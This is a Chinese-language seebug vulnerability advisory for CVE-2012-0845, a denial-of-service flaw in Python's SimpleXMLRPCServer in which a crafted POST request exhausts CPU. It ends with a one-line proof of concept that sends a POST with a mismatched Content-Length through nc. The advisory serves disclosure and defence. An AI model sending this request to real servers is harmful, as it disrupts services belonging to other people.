Lucene search

K
seebugRootSSV:30124
HistoryFeb 16, 2012 - 12:00 a.m.

Python SimpleXMLRPCServer远程拒绝服务漏洞

2012-02-1600:00:00
Root
www.seebug.org
20

0.16 Low

EPSS

Percentile

95.4%

BUGTRAQ ID: 51996
CVE ID: CVE-2012-0845

Python是一种面向对象、直译式计算机程序设计语言,也是一种功能强大的通用型语言。

Python在实现上存在远程拒绝服务漏洞,攻击者可通过特制的HTTP POST请求利用此漏洞造成拒绝服务。

此漏洞源于在处理POST请求时,"SimpleXMLRPCRequestHandler.do_POST()"方法没有正确处理EOF,可通过特制的请求导致较高的CPU消耗。
0
python 3.x
python 2.7.x
厂商补丁:

Python

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.python.org


                                                $ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345